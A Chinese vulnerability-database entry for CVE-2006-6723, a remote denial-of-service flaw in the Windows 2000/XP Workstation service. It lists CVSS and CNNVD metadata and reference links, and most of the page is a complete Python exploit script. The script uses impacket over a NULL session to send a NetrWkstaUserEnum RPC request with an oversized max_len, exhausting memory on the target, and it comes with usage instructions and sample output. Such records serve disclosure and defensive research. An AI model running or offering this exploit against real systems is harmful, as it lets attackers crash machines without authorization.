Microsoft Windows 2000 NetrWkstaUserEnum RPC请求拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111856 漏洞类型 资源管理错误
发布时间 2006-12-25 更新时间 2006-12-26
CVE编号 CVE-2006-6723 CNNVD-ID CNNVD-200612-537
漏洞平台 Windows CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/3013
https://www.securityfocus.com/bid/87236
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-537
|漏洞详情
MicrosoftWindows2000SP4和XPSP2中的工作站服务存在拒绝服务攻击漏洞。远程攻击者可以通过在一个NetrWkstaUserEnumRPC请求中的大maxlen值发起拒绝服务攻击(内存损耗)。
|漏洞EXP
#!/usr/bin/python
# MS Windows Workstation Service NetrWkstaUserEnum() 0day Memory Allocation Remote DoS Exploit
# Bug discovered by h07 <h07@interia.pl>
# Tested on:..
# - Windows XP SP2 Polish
# - Windows 2000 SP4 Polish + All Microsoft Security Bulletins
# Example:
#
# wks_dos.py 192.168.0.2 512
#
# [*] MS Windows NetrWkstaUserEnum() 0day Memory Allocation Remote DoS Exploit
# [*] Coded by h07 <h07@interia.pl>
# [*] Connecting to 192.168.0.2:445 (NULL Session)
# [+] Connected
# [+] The NETBIOS connection with the remote host timed out.
# [+] 192.168.0.2: Out of memory
# [+] Done
#
# NetrWkstaUserEnum(max_len = 1024 * 1024 * 512)
# Exploit --> NULL Session --> PIPE: browser --> NetrWkstaUserEnum() --> Windows XP
# svchost.exe memory usage: 512 MB
##

from impacket.structure import Structure
from impacket.nmb import NetBIOSTimeout
from impacket.dcerpc import transport
from impacket import uuid
from struct import pack
from string import atoi
from sys import argv
from sys import exit

print "\n[*] MS Windows NetrWkstaUserEnum() 0day Memory Allocation Remote DoS Exploit"
print "[*] Coded by h07 <h07@interia.pl>"

if(len(argv) < 3):
  print "[*] Usage: %s <host> <memory_size(MB)>" % (argv[0])
  print "[*] Sample: %s 192.168.0.1 512" % (argv[0])
  exit()

MB = 1024 * 1024
host = argv[1]
memory_size = MB * atoi(argv[2])
pipe = 'browser'
UUID = ('6bffd098-a112-3610-9833-46c3f87e345a', '1.0')

stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
stringbinding %= {'host':host, 'pipe':pipe}

def utf16(str):
   return str.encode('utf_16_le')

class B1(Structure):
   alignment = 4
   structure = (
       ('id', '<L=0x41414141'),
       ('max', '<L'),
       ('offset', '<L=0'),
       ('actual', '<L'),
       ('str', '%s'),
   )

class NetrWkstaUserEnum(Structure):
   alignment = 4
   opnum = 2
   structure = (
       ('server', ':', B1),
       ('info_level1', '<L=1'),
       ('info_level2', '<L=1'),
       ('referent_id1', '<L=0x42424242'),
       ('num_entries', '<L=0'),
       ('null_pointer', '<L=0'),
       ('max_len', '<L'),
       ('referent_id2', '<L=0x43434343'),
       ('enumeration_handle', '<L=0x00000000'),
   )

query = NetrWkstaUserEnum()
server = "%s\x00" % (host)
query['server'] = B1()
query['server']['id'] = 0x41414141
query['server']['actual'] = len(server)
query['server']['max'] = len(server)
query['server']['str'] = utf16(server)
query['max_len'] = memory_size

trans = transport.DCERPCTransportFactory(stringbinding)

print "[*] Connecting to %s:445 (NULL Session)" % (host)

try:
  trans.connect()

except Exception, err:
  print "[-] %s" % (err)
  exit()

print "[+] Connected"

dce = trans.DCERPC_class(trans)
dce.bind(uuid.uuidtup_to_bin((UUID[0], UUID[1])))
dce.call(query.opnum, query)

try:
  raw = dce.recv()
  status = raw[-4:]

  if(status == pack("<L", 0x00000005)):
      print "[-] Return code: Access denied"
      exit()

  if(status == pack("<L", 0x00000008)):
      print "[-] Return code: Memory allocation error, out of memory"
      exit()

  if(status == pack("<L", 0x00000000)):
      print "[+] Return code: Success, memory allocated"

except NetBIOSTimeout, err:
  print "[+] %s" % (err)
  print "[+] %s: Out of memory" % (host)

print "[+] Done"

# EoF

# milw0rm.com [2006-12-25]
|受影响的产品
Microsoft Windows 2000 Server SP4
|参考资料

来源:VUPEN
名称:ADV-2006-5142
链接:http://www.frsirt.com/english/advisories/2006/5142
来源:SECUNIA
名称:23487
链接:http://secunia.com/advisories/23487
来源:MILW0RM
名称:3013
链接:http://milw0rm.com/exploits/3013
来源:SECTRACK
名称:1017441
链接:http://securitytracker.com/id?1017441